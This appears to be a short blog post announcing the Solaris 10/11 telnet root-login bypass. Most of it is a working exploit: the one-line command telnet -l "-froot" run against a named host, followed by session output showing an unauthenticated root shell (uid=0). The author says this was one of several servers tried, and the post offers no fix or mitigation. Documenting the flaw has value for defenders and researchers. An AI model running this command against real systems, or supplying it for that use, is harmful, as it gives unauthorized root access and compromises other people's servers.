Just learned today, that if Solaris 10 or 11 is installed and root login for telnet is enabled you are owned! Yes — Owned!!
Credit goes to: http://riosec.com, who was rightfully Slashdotted!
Here is the output from one of the servers I tried:
===> swinful@swinful2> telnet -l "-froot" poor.security-host.com
Trying xxx.xxx.xxx.xxx...
Connected to poor.security-host.com.
Escape character is '^]'.
[ Trying mutual KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
[ Trying KERBEROS5 (host/poor.security-host.com@SECURITY-HOST.COM)... ]
Kerberos V5: mk_req failed (No such file or directory)
Last login: Mon Jan 1 20:25:16 from yyy.yyy.yyy.yyy
In /etc/profile -bash
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have new mail.
-bash-3.00# uname -a
SunOS poor 5.10 Generic_118833-03 sun4u sparc SUNW,Sun-Fire-V490
-bash-3.00# id
uid=0(root) gid=0(root)
-bash-3.00# exit
logout
Connection closed by foreign host.
Well-Rounded 